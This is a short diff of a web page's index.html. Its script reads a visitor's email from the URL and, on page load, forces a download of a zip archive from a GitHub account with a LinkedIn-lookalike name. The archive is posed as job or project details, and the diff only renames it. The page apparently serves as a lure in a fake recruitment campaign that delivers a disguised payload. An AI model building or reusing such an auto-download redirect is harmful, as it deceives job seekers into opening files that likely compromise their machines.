--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
-window.location.href = `https://github.com/LlnkedlnJodoppening/Jobopenings/raw/refs/heads/main/Job%20Description%20and%20Company%20Details.zip`;</script>
+window.location.href = `https://github.com/LlnkedlnJodoppening/Jobopenings/raw/refs/heads/main/Project%20details.zip`;</script>
